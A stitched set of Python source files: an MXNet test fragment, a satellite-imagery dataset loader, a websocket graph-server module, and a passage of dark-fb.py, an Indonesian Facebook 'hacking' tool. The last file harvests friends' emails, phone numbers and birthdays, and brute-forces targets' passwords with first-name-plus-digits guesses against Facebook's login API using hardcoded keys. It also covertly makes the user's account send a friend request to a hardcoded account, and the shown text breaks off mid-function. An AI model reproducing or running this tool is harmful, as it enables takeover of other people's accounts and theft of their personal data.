f = e[1:size + 1].reshape(shape)
mx.nd.broadcast_add(c, d, out=f)
expected = c.asnumpy() + d.asnumpy()
mx.nd.waitall()
assert_almost_equal(f, expected)
|
dataset.py
|
# -*- coding: utf-8 -*-
"""
Copyright (c) 2020-2022 INRAE
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
"""Dataset classes"""
import abc
import collections.abc
import json
import logging
import multiprocessing
import threading
import time
import tensorflow as tf
import numpy as np
import random
from decloud.core import system
# -------------------------------------------------- Buffer class ------------------------------------------------------
class Buffer:
"""
Buffer class
Used to store and access list of objects
"""
def __init__(self, max_length):
self.max_length = max_length
self.container = []
def size(self):
""" Return buffer size """
return len(self.container)
def add(self, new_elem):
""" Add a new element to the buffer """
self.container.append(new_elem)
assert self.size() <= self.max_length
def is_complete(self):
""" Return True if the buffer is complete"""
return self.size() == self.max_length
# ---------------------------------------------- RandomIterator class --------------------------------------------------
class BaseIterator(abc.ABC):
"""
Base class for iterators
"""
@abc.abstractmethod
def __init__(self, acquisitions_layout, tile_handlers, tile_rois):
self.tuples_grids = {tile_name: tile_handler.tuple_search(acquisitions_layout=acquisitions_layout,
roi=tile_rois[tile_name] if tile_name in tile_rois
else None)
for tile_name, tile_handler in tile_handlers.items()}
def __iter__(self):
return self
@abc.abstractmethod
def __next__(self):
""" Provides a sequence of (tile_name, tuple_pos, tuple_indices) """
@abc.abstractmethod
def shuffle(self):
""" Shuffle the sequence """
class RandomIterator(BaseIterator):
"""
The most basic iterator. Pick a random tuple within all the available ones, regardless its position in the grid,
or anything.
A mapping tuple_id --> (tuple_pos, tuple_indices) is created, then a random tuple is picked among the tuple_ids,
then the corresponding tuple is accessed.
"""
def __init__(self, acquisitions_layout, tile_handlers, tile_rois):
# Count the number of available tuples, and map the tuples: id --> (tile_name, tuple_pos, tuple_indices)
super().__init__(acquisitions_layout, tile_handlers, tile_rois)
# Tuple ID list
self.nb_of_tuples = 0
self.tuples_map = dict()
for tile_name, tuples_grid in self.tuples_grids.items():
for tuple_pos, tuple_indices in tuples_grid.items():
for tuple_idx in tuple_indices:
self.tuples_map[self.nb_of_tuples] = (tile_name, tuple_pos, tuple_idx)
self.nb_of_tuples += 1
self.indices = np.arange(0, self.nb_of_tuples)
self.shuffle()
self.count = 0
def __next__(self):
current_index = self.indices[self.count]
ret = self.tuples_map[current_index]
if self.count < self.nb_of_tuples - 1:
self.count += 1
else:
self.shuffle()
self.count = 0
return ret
def shuffle(self):
np.random.shuffle(self.indices)
class ConstantIterator(BaseIterator):
"""
An iterator that aims to deliver the same number of samples at each patch location.
A mapping tuple_id --> (tuple_pos, tuple_indices) is created, then a random tuple is picked among the tuple_ids,
then the corresponding tuple is accessed.
Note that after one epoch, samples are still the same: we don't pick random samples at each new iteration, which
is not really a problem if we convert them in tfrecords directly.
"""
def __init__(self, acquisitions_layout, tile_handlers, tile_rois, nbsample_max=10):
# Count the number of available tuples, and map the tuples: id --> (tile_name, tuple_pos, tuple_indices)
super().__init__(acquisitions_layout, tile_handlers, tile_rois)
# Tuple ID list
self.nb_of_tuples = 0
self.tuples_map = dict()
for tile_name, tuples_grid in self.tuples_grids.items():
for tuple_pos, tuple_indices in tuples_grid.items():
rand_tuple_indices = random.sample(tuple_indices, nbsample_max) if len(tuple_indices) > nbsample_max \
else tuple_indices
for tuple_idx in rand_tuple_indices:
self.tuples_map[self.nb_of_tuples] = (tile_name, tuple_pos, tuple_idx)
self.nb_of_tuples += 1
self.indices = np.arange(0, self.nb_of_tuples)
self.shuffle()
self.count = 0
def __next__(self):
current_index = self.indices[self.count]
ret = self.tuples_map[current_index]
if self.count < self.nb_of_tuples - 1:
self.count += 1
else:
self.shuffle()
self.count = 0
return ret
def shuffle(self):
np.random.shuffle(self.indices)
def update(tuple_map, tmp):
""" Update the tuple map """
for key, value in tmp.items():
if isinstance(value, collections.abc.Mapping):
tuple_map[key] = update(tuple_map.get(key, {}), value)
else:
tuple_map[key] = value
return tuple_map
class OversamplingIterator(BaseIterator):
"""
Iterator that provides the same amount of samples for each season
Seasons are defined in self.months_list
"""
def __init__(self, acquisitions_layout, tile_handlers, tile_rois):
super().__init__(acquisitions_layout, tile_handlers, tile_rois)
self.months_list = [[3, 4, 5], [6, 7, 8], [9, 10, 11], [12, 1, 2]]
self.distribution = dict()
for i in range(len(self.months_list)):
self.distribution[i] = dict({"count": 0, "number": 0})
self.tuples_map = dict()
self.nb_of_tuples = 0
for tile_name, tuples_grid in self.tuples_grids.items():
for tuple_pos, tuple_indices in tuples_grid.items():
for tuple_idx in tuple_indices:
idx = None
for idx_month, month in enumerate(self.months_list):
if tile_handlers[tile_name].s2_images[tuple_idx["t"]["s2"]].acq_date.month in month:
idx = idx_month
assert idx is not None,\
"Date from image {} not in date range".format(
tile_handlers[tile_name].s2_images[tuple_idx["t"]["s2"]])
tmp = {idx: {self.distribution[idx]["number"]: (tile_name, tuple_pos, tuple_idx)}}
self.distribution[idx]["number"] += 1
self.tuples_map = update(self.tuples_map, tmp)
self.nb_of_tuples += 1
self.keys = list(self.tuples_map.keys())
self.indices = dict()
for idx in self.distribution:
indices = {idx: np.arange(0, self.distribution[idx]["number"])}
self.indices.update(indices)
self.shuffle_indices(idx)
logging.info("Distribution: %s", self.indices)
def shuffle_indices(self, idx):
""" Shuffle the indices of the idx-th season """
np.random.shuffle(self.indices[idx])
def shuffle(self):
for idx in self.distribution:
self.shuffle_indices(idx)
def __next__(self):
"""
Provides a sequence of (tile_name, tuple_pos, tuple_indices)
"""
idx = int(np.random.randint(len(self.keys)))
pos = self.keys[idx]
current_index = self.indices[pos][self.distribution[pos]["count"]]
ret = self.tuples_map[pos][current_index]
if self.distribution[pos]["count"] < self.distribution[pos]["number"] - 1:
self.distribution[pos]["count"] += 1
else:
self.shuffle_indices(pos)
self.distribution[pos]["count"] = 0
return ret
class LimitedIterator(OversamplingIterator):
"""
Iterator that ends after a fixed number of samples
"""
def __init__(self, acquisitions_layout, tile_handlers, tile_rois, nb_samples=1000):
super().__init__(acquisitions_layout, tile_handlers, tile_rois)
self.nb_of_tuples = nb_samples
# ------------------------------------------------- Dataset class ------------------------------------------------------
class Dataset:
"""
Handles the "mining" of the tile handlers.
This class has a thread that extract tuples from the tile handlers, while ensuring the access of already gathered
tuples.
"""
def __init__(self, acquisitions_layout, tile_handlers, tile_rois, buffer_length=128, iterator_class=RandomIterator,
max_nb_of_samples=None):
"""
:param acquisitions_layout: The acquisitions layout (instance of sensing_layout.AcquisitionsLayout)
:param tile_handlers: A dict() of tile_io.TileHandler instances. The keys of the dict() are the tile name.
:param tile_rois: A dict() of ROIs. The keys of the dict() are the tile name.
:param buffer_length: The number of samples that are stored in the buffer.
:param iterator_class: An iterator that provides a sequence of (tile_name, tuple_pos, tuple_indices)
:param max_nb_of_samples: Optional, max number of samples to consider
for the samples to be read.
"""
# tile handlers
self.tile_handlers = tile_handlers
# iterator
self.iterator = iterator_class(acquisitions_layout, tile_handlers, tile_rois)
self.size = min(self.iterator.nb_of_tuples,
max_nb_of_samples) if max_nb_of_samples else self.iterator.nb_of_tuples
# Get patches sizes and type, of the first sample of the first tile
self.output_types = dict()
self.output_shapes = dict()
# Here we read the first available sample, and we exit breaking all loops
for tile_name, tile_tuples_grid in self.iterator.tuples_grids.items():
for tuple_pos, tuple_indices in tile_tuples_grid.items():
for indices in tuple_indices:
new_sample = self.tile_handlers[tile_name].read_tuple(tuple_pos=tuple_pos, tuple_indices=indices)
for key, np_arr in new_sample.items():
if isinstance(np_arr, (np.ndarray, np.generic)):
self.output_shapes[key] = np_arr.shape
self.output_types[key] = tf.dtypes.as_dtype(np_arr.dtype)
break
break
if self.output_shapes: # we break only if there was a sample, otherwise we continue to next tile
break
logging.info("output_types: %s", self.output_types)
logging.info("output_shapes: %s", self.output_shapes)
# buffers
self.miner_buffer = Buffer(buffer_length)
self.consumer_buffer = Buffer(buffer_length)
self.consumer_buffer_pos = 0
self.tot_wait = 0
self.miner_thread = self._summon_miner_thread()
self.read_lock = multiprocessing.Lock()
self._dump()
# Prepare tf dataset
self.tf_dataset = tf.data.Dataset.from_generator(self._generator,
output_signature={
name: tf.TensorSpec(shape=self.output_shapes[name],
dtype=self.output_types[name],
name=name) for name in
self.output_types}).repeat(1)
def read_one_sample(self):
"""
Read one element of the consumer_buffer
The lock is used to prevent different threads to read and update the internal counter concurrently
"""
with self.read_lock:
output = None
if self.consumer_buffer_pos < self.consumer_buffer.max_length:
output = self.consumer_buffer.container[self.consumer_buffer_pos]
self.consumer_buffer_pos += 1
if self.consumer_buffer_pos == self.consumer_buffer.max_length:
self._dump()
self.consumer_buffer_pos = 0
return output
def _dump(self):
"""
This function dumps the miner_buffer into the consumer_buffer, and restart the miner_thread
"""
# Wait for miner to finish his job
start_time = time.time()
self.miner_thread.join()
self.tot_wait += time.time() - start_time
# Copy miner_buffer.container --> consumer_buffer.container
self.consumer_buffer.container = self.miner_buffer.container.copy()
# Clear miner_buffer.container
self.miner_buffer.container.clear()
# Restart miner_thread
self.miner_thread = self._summon_miner_thread()
def _collect(self):
"""
This function collects samples.
It is threaded by the miner_thread.
"""
# Fill the miner_container until it's full
while not self.miner_buffer.is_complete():
try:
tile_name, tuple_pos, tuple_indices = next(self.iterator)
new_sample = self.tile_handlers[tile_name].read_tuple(tuple_pos=tuple_pos, tuple_indices=tuple_indices)
self.miner_buffer.add(new_sample)
except KeyboardInterrupt:
logging.info("Interrupted by user. Exiting.")
system.terminate()
def _summon_miner_thread(self):
"""
Create and starts the thread for the data collect
"""
miner_thread = threading.Thread(target=self._collect)
miner_thread.start()
return miner_thread
def _generator(self):
"""
Generator function, used for the tf dataset
"""
for _ in range(self.size):
yield self.read_one_sample()
def get_tf_dataset(self, batch_size, drop_remainder=True):
"""
Returns a TF dataset, ready to be used with the provided batch size
:param batch_size: the batch size
:param drop_remainder: drop incomplete batches when True
:return: The TF dataset
"""
return self.tf_dataset.batch(batch_size, drop_remainder=drop_remainder)
def get_total_wait_in_seconds(self):
"""
Returns the number of seconds during which the data gathering was delayed due to I/O bottleneck
:return: duration in seconds
"""
return self.tot_wait
class RoisLoader(dict):
"""
A class that instantiate some ROIs from a json file
Keys:
- "ROIS_ROOT_DIR": str
- "TRAIN_TILES": str
- "VALID_TILES": str
Example of a .json file:
{
"ROIS_ROOT_DIR": "/data/decloud/ROI",
"TRAIN_TILES":["T31TCK", "T31TDJ"],
"VALID_TILES":["T31TEJ", "T31TCJ", "T31TDH"]
}
"""
def __init__(self, the_json):
super().__init__()
logging.info("Loading rois from %s", the_json)
with open(the_json) as json_file:
data = json.load(json_file)
root_dir_key = "ROIS_ROOT_DIR"
assert root_dir_key in data
self.rois_root_dir = data[root_dir_key]
assert isinstance(self.rois_root_dir, str)
self.rois_root_dir = system.pathify(self.rois_root_dir)
def get_list(key):
"""
Retrieve a list of str
:param key: key
:return: list of str
"""
assert key in data
item = data[key]
assert isinstance(item, list)
return item
# Tiles list
self.train_tiles_list = get_list("TRAIN_TILES")
self.valid_tiles_list = get_list("VALID_TILES")
self.fill_dict(self.train_tiles_list, "train")
self.fill_dict(self.valid_tiles_list, "valid")
def fill_dict(self, tiles_list, suffix):
"""
Check if files are there and fill dict
:param tiles_list: tile list
:param suffix: file suffix (e.g. "train")
"""
tiles = {}
for tile in tiles_list:
roi_file = "{}{}_{}.tif".format(self.rois_root_dir, tile, suffix)
assert system.file_exists(roi_file)
tiles.update({tile: roi_file})
self.update({"roi_{}".format(suffix): tiles})
|
connection.py
|
graph_client_dict = {}
current_server = None
reloaded_graph = None
# Called for every client connecting
def new_client(client, server):
global reloaded_graph
if client['id'] not in graph_client_dict :
# If some other client has left (cf. client_left())
if reloaded_graph :
graph_client_dict[client['id']] = reloaded_graph
print("Page reloaded. New client id is %d" % client['id'])
else :
end_connection_client(client, server)
print("Client %d could not connect. Use show_CustomJS(graph)" % client['id'])
else :
print("New client connected and was given id %d" % client['id'])
reloaded_graph = None
# Called for every client disconnecting
def client_left(client, server):
global graph_client_dict,current_server, reloaded_graph
if client['id'] in graph_client_dict :
print("Client(%d) disconnected" % client['id'])
reloaded_graph = graph_client_dict.pop(client['id'])
# Waiting for half sec in case a new client will appear in empty graph_client_dict (for page reload)
import time
time.sleep(0.5)
if not graph_client_dict :
server.shutdown()
print("server closed")
current_server = None
import threading
def launch_connection():
t = threading.Thread(target=connect)
t.start()
def port_in_use(port: int) -> bool:
import socket
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
return s.connect_ex(('localhost', port)) == 0
def connect():
PORT=9001
#version avec un if
'''if (port_in_use(PORT) == 0) :
server = None
server = WebsocketServer(PORT)
server.set_fn_new_client(new_client)
server.set_fn_client_left(client_left)
server.set_fn_message_received(message_received)
global current_server
current_server = server
server.run_forever()
else :
print("Veuillez fermer ma page avant de lancer un nouveua graph")
'''
#version avec un raise exception
if (port_in_use(PORT) == 1 ) :
raise Exception('Le port est occupé veuillez fermer la page \n avant de lance un nouveau Graph')
else :
server = None
server = WebsocketServer(PORT)
server.set_fn_new_client(new_client)
server.set_fn_client_left(client_left)
server.set_fn_message_received(message_received)
global current_server
current_server = server
server.run_forever()
from json import JSONEncoder
from time import gmtime, strftime
# Called when a client sends a message
def message_received(client, server, message):
global graph_client_dict, reload_in_process
if client['id'] in graph_client_dict :
print(strftime('[%H:%M:%S]', gmtime()))
targetGraph = graph_client_dict[client['id']]
JSONmessage = DataGraph(message)
# Reverse connection between Sage and JS
if JSONmessage.parameter == "renewGraph":
response, newGraph = handle_message(JSONmessage.parameter,targetGraph)
else:
newGraph = ConstructGraphFromJSONObject(JSONmessage)
response, newGraph = handle_message(JSONmessage.parameter,newGraph)
update_graph(targetGraph, newGraph)
if(JSONmessage.message != ""):
print(JSONmessage.message)
if response[1] != None :
returnMessage = JSONEncoder().encode({"request":response[0], "result": response[1]})
server.send_message(client,returnMessage)
else :
end_connection_client(client, server)
def handle_message(parameter,graph):
response = None
if parameter is not None:
response, graph = JS_functions_dict[parameter](graph)
return response, graph
def end_connection_client(client, server):
returnMessage = JSONEncoder().encode({"request":'closeConnection', "result": ''})
server.send_message(client,returnMessage)
def client_dictionnary_verification(G):
global current_server, graph_client_dict
if G in graph_client_dict.values() :
idGraph = id(G)
for key in graph_client_dict.keys() :
if id(graph_client_dict[key]) == idGraph :
client_to_remove = None
for client in current_server.clients:
if client['id'] == key :
end_connection_client(client, current_server)
|
dark-fb.py
|
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print '\x1b[1;91m[!] Keluar'
os.sys.exit()
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.01)
logo = '\x1b[1;92m\n\xe2\x95\x94\xe2\x95\xa6\xe2\x95\x97\xe2\x94\x8c\xe2\x94\x80\xe2\x94\x90\xe2\x94\xac\xe2\x94\x80\xe2\x94\x90\xe2\x94\xac\xe2\x94\x8c\xe2\x94\x80 \xe2\x95\x94\xe2\x95\x90\xe2\x95\x97\xe2\x95\x94\xe2\x95\x97 \n \xe2\x95\x91\xe2\x95\x91\xe2\x94\x9c\xe2\x94\x80\xe2\x94\xa4\xe2\x94\x9c\xe2\x94\xac\xe2\x94\x98\xe2\x94\x9c\xe2\x94\xb4\xe2\x94\x90\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\xa0\xe2\x95\xa3 \xe2\x95\xa0\xe2\x95\xa9\xe2\x95\x97\n\xe2\x95\x90\xe2\x95\xa9\xe2\x95\x9d\xe2\x94\xb4 \xe2\x94\xb4\xe2\x94\xb4\xe2\x94\x94\xe2\x94\x80\xe2\x94\xb4 \xe2\x94\xb4 \xe2\x95\x9a \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \x1b[1;93mv1.7\n\x1b[1;93m* \x1b[1;97mRecode \x1b[1;91m: \x1b[1;96mMR @Joshua_Ir$A\x1b[1;97m\n\x1b[1;93m* \x1b[1;97mYouTube \x1b[1;91m: \x1b[1;96mVoltHz Official \x1b[1;97m[\x1b[1;96m\x1b[1;97m] \x1b[1;97m/ \x1b[1;96m& Spesial Thanks To MR.K7C8NG \x1b[1;97m/ \x1b[1;96mSubscribe\n\x1b[1;93m* \x1b[1;97mGitHub \x1b[1;91m: \x1b[1;92m\x1b[4mhttps://github.com/volthzofficial\x1b[0m\n[~] Dibawah lisensi \n'
print 'Gunakan Dengan Baik!!'
def tik():
titik = [
'. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mLogin \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
gagal = []
idteman = []
idfromteman = []
idmem = []
id = []
em = []
emfromteman = []
hp = []
hpfromteman = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
def login():
os.system('clear')
try:
toket = open('login.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mLogin Menggunakan Facebook \x1b[1;91m[\xe2\x98\x86]'
id = raw_input('\x1b[1;91m[~] \x1b[1;36mUsername \x1b[1;91m:\x1b[1;92m ')
pwd = getpass.getpass('\x1b[1;91m[~] \x1b[1;36mPassword \x1b[1;91m:\x1b[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print '\n\x1b[1;91m[!] Tidak ada koneksi'
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'}
x = hashlib.new('md5')
x.update(sig)
a = x.hexdigest()
data.update({'sig': a})
url = 'https://api.facebook.com/restserver.php'
r = requests.get(url, params=data)
z = json.loads(r.text)
zedd = open('login.txt', 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin berhasil'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token'])
os.system('xdg-open https://youtube.com/volthzofficial')
time.sleep(2)
menu()
except requests.exceptions.ConnectionError:
print '\n\x1b[1;91m[!] Tidak ada koneksi'
keluar()
if 'checkpoint' in url:
print '\n\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print '\n\x1b[1;91m[!] Login Gagal'
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
os.system('clear')
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print '\x1b[1;91m[!] \x1b[1;93mSilahkan login kembali'
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Tidak ada koneksi'
keluar()
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94' + 40 * '\xe2\x95\x90'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Nama \x1b[1;91m: \x1b[1;92m' + nama
print '\x1b[1;97m\xe2\x95\x9a' + 40 * '\xe2\x95\x90'
print '\x1b[1;37;40m1. Informasi Pengguna'
print '\x1b[1;37;40m2. Hack Akun Facebook'
print '\x1b[1;37;40m3. Bot '
print '\x1b[1;37;40m4. Lainnya.... '
print '\x1b[1;37;40m5. Logout '
print '\x1b[1;31;40m0. Keluar '
print
pilih()
def pilih():
zedd = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if zedd == '':
print '\x1b[1;91m[!] Jangan kosong'
pilih()
else:
if zedd == '1':
informasi()
else:
if zedd == '2':
menu_hack()
else:
if zedd == '3':
menu_bot()
else:
if zedd == '4':
lain()
else:
if zedd == '5':
os.system('rm -rf login.txt')
os.system('xdg-open https://www.youtube.com/volthzofficial')
keluar()
else:
if zedd == '0':
keluar()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mTidak ada'
pilih()
def informasi():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID\x1b[1;97m/\x1b[1;92mNama\x1b[1;91m : \x1b[1;97m')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(r.text)
for p in cok['data']:
if id in p['name'] or id in p['id']:
r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket)
z = json.loads(r.text)
print 40 * '\x1b[1;97m\xe2\x95\x90'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + z['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNama\x1b[1;97m : \x1b[1;91mTidak ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mTidak ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mTidak ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNomor HP\x1b[1;97m : ' + z['mobile_phone']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNomor HP\x1b[1;97m : \x1b[1;91mTidak ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLokasi\x1b[1;97m : ' + z['location']['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLokasi\x1b[1;97m : \x1b[1;91mTidak ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mTanggal Lahir\x1b[1;97m : ' + z['birthday']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mTanggal Lahir\x1b[1;97m : \x1b[1;91mTidak ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSekolah\x1b[1;97m : '
for q in z['education']:
try:
print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name']
except KeyError:
print '\x1b[1;91m ~ \x1b[1;91mTidak ada'
except KeyError:
pass
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] Pengguna tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu()
def menu_hack():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Mini Hack Facebook(\x1b[1;92mTarget\x1b[1;97m)'
print '\x1b[1;37;40m2. Multi Bruteforce Facebook'
print '\x1b[1;37;40m3. Super Multi Bruteforce Facebook'
print '\x1b[1;37;40m4. BruteForce(\x1b[1;92mTarget\x1b[1;97m)'
print '\x1b[1;37;40m5. Yahoo Checker'
print '\x1b[1;37;40m6. Ambil id/email/hp'
print '\x1b[1;31;40m0. Kembali'
print
hack_pilih()
def hack_pilih():
hack = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if hack == '':
print '\x1b[1;91m[!] Jangan kosong'
hack_pilih()
else:
if hack == '1':
mini()
else:
if hack == '2':
crack()
hasil()
else:
if hack == '3':
super()
else:
if hack == '4':
brute()
else:
if hack == '5':
menu_yahoo()
else:
if hack == '6':
grab()
else:
if hack == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mTidak ada'
hack_pilih()
def mini():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[ INFO ] Akun target harus berteman dengan akun anda dulu !'
try:
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
a = json.loads(r.text)
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
jalan('\x1b[1;91m[+] \x1b[1;92mMemeriksa \x1b[1;97m...')
time.sleep(2)
jalan('\x1b[1;91m[+] \x1b[1;92mMembuka keamanan \x1b[1;97m...')
time.sleep(2)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
pz1 = a['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
